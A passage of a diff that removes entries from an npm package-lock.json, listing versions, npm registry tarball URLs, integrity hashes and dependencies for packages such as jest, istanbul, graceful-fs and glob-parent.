"path-is-absolute": "^1.0.0" - } - }, - "glob-parent": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", - "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", - "dev": true, - "peer": true, - "requires": { - "is-glob": "^4.0.1" - } - }, - "globals": { - "version": "13.10.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.10.0.tgz", - "integrity": "sha512-piHC3blgLGFjvOuMmWZX60f+na1lXFDhQXBf1UYp2fXPXqvEUbOhNwi6BsQ0bQishwedgnjkwv1d9zKf+MWw3g==", - "dev": true, - "peer": true, - "requires": { - "type-fest": "^0.20.2" - } - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "requires": { - "function-bind": "^1.1.2" - } - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "ignore": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-4.0.6.tgz", - "integrity": "sha512-cyFDKrqc/YdcWFniJhzI42+AzS+gNwmUzOSFcRCQYwySuBBBy/KjuxWLZ/FHEH6Moq1NizMOBWyTcv8O4OZIMg==", - "dev": true, - "peer": true - }, - "import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "requires": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - } - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha1-d8mYQFJ6qOyxqLppe4BkWnqSap0=", - "dev": true - }, - "is-core-module": { - "version": "2.13.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", - "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", - "dev": true, - "requires": { - "hasown": "^2.0.0" - } - }, - "is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=", - "dev": true, - "peer": true - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-glob": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.1.tgz", - "integrity": "sha512-5G0tKtBTFImOqDnLB2hG6Bp2qcKEFduo4tZu9MT/H6NQv/ghhy30o55ufafxJ/LdH79LLs2Kfrn85TLKyA7BUg==", - "dev": true, - "peer": true, - "requires": { - "is-extglob": "^2.1.1" - } - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.2.tgz", - "integrity": "sha512-1WUsZ9R1lA0HtBSohTkm39WTPlNKSJ5iFk7UwqXkBLoHQT+hfqPsfsTDVuZdKGaBwn7din9bS7SsnoAr943hvw==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jackspeak": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-2.3.6.tgz", - "integrity": "sha512-N3yCS/NegsOBokc8GAdM8UcmfsKiSS8cipheD/nivzr700H+nsMOxJjQnvwOcRYVuFkdH0wGUvW2WbXGmrZGbQ==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, - "jake": { - "version": "10.9.1", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.1.tgz", - "integrity": "sha512-61btcOHNnLnsOdtLgA5efqQWjnSi/vow5HbI7HMdKKWqvrKR1bLK3BPlJn9gcSaP2ewuamUSMB5XEy76KUIS2w==", - "dev": true, - "requires": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.18.6", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.18.6.tgz", - "integrity": "sha512-TDCmlK5eOvH+eH7cdAFlNXeVJqWIQ7gW9tY1GJIpUtFb6CmjVyq2VM3u71bOyR8CRihcCgMUYoDNyLXao3+70Q==", - "dev": true, - "requires": { - "@babel/highlight": "^7.18.6" - } - } - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runner-eslint": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/jest-runner-eslint/-/jest-runner-eslint-2.2.1.tgz", - "integrity": "sha512-BSAB65hGhtr/Kmb7tSkfqFmK9LYwCMK8L1xcp+XaSToPFqr7sY1jleMZUeDhV0ITA33pW+JUCx5a02veVD2Q2w==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "cosmiconfig": "^7.0.0", - "create-jest-runner": "^0.11.2", - "dot-prop": "^6.0.1" - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.24.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.24.2.tgz", - "integrity": "sha512-y5+tLQyV8pg3fsiln67BVLD1P13Eg4lh5RW9mF0zUuvLrv9uIQ4MCL+CRT+FTsBlBjcIan6PGsLcBN0m3ClUyQ==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@babel/highlight": "^7.24.2", - "picocolors": "^1.0.0" - } - }, - "@jest/console": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-28.1.3.tgz", - "integrity": "sha512-QPAkP5EwKdK/bxIr6C1I4Vs0rm2nHiANzj/Z5X2JQkrZo6IqvC4ldZ9K95tF0HdidhA8Bo6egxSzUFPYKcEXLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^28.1.3", - "jest-util": "^28.1.3", - "slash": "^3.0.0" - } - }, - "@jest/environment": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-28.1.3.tgz", - "integrity": "sha512-1bf40cMFTEkKyEf585R9Iz1WayDjHoHqvts0XFYEqyKM3cFWDpeMoqKKTAF9LSYQModPUlh8FKptoM2YcMWAXA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/fake-timers": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "jest-mock": "^28.1.3" - } - }, - "@jest/expect": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-28.1.3.tgz", - "integrity": "sha512-lzc8CpUbSoE4dqT0U+g1qODQjBRHPpCPXissXD4mS9+sWQdmmpeJ9zSH1rS1HEkrsMN0fb7nKrJ9giAR1d3wBw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "expect": "^28.1.3", - "jest-snapshot": "^28.1.3" - } - }, - "@jest/expect-utils": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-28.1.3.tgz", - "integrity": "sha512-wvbi9LUrHJLn3NlDW6wF2hvIMtd4JUl2QNVrjq+IBSHirgfrR3o9RnVtxzdEGO2n9JyIWwHnLfby5KzqBGg2YA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "jest-get-type": "^28.0.2" - } - }, - "@jest/fake-timers": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-28.1.3.tgz", - "integrity": "sha512-D/wOkL2POHv52h+ok5Oj/1gOG9HSywdoPtFsRCUmlCILXNn5eIWmcnd3DIiWlJnpGvQtmajqBP95Ei0EimxfLw==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "@sinonjs/fake-timers": "^9.1.2", - "@types/node": "*", - "jest-message-util": "^28.1.3", - "jest-mock": "^28.1.3", - "jest-util": "^28.1.3" - } - }, - "@jest/globals": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-28.1.3.tgz", - "integrity": "sha512-XFU4P4phyryCXu1pbcqMO0GSQcYe1IsalYCDzRNyhetyeyxMcIxa11qPNDpVNLeretItNqEmYYQn1UYz/5x1NA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/environment": "^28.1.3", - "@jest/expect": "^28.1.3", - "@jest/types": "^28.1.3" - } - }, - "@jest/schemas": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-28.1.3.tgz", - "integrity": "sha512-/l/VWsdt/aBXgjshLWOFyFt3IVdYypu5y2Wn2rOO1un6nkqIn8SLXzgIMYXFyYsRWDyF5EthmKJMIdJvk08grg==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@sinclair/typebox": "^0.24.1" - } - }, - "@jest/source-map": { - "version": "28.1.2", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-28.1.2.tgz", - "integrity": "sha512-cV8Lx3BeStJb8ipPHnqVw/IM2VCMWO3crWZzYodSIkxXnRcXJipCdx1JCK0K5MsJJouZQTH73mzf4vgxRaH9ww==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.13", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-28.1.3.tgz", - "integrity": "sha512-kZAkxnSE+FqE8YjW8gNuoVkkC9I7S1qmenl8sGcDOLropASP+BkcGKwhXoyqQuGOGeYY0y/ixjrd/iERpEXHNg==", - "dev": true, - "optional": true, - 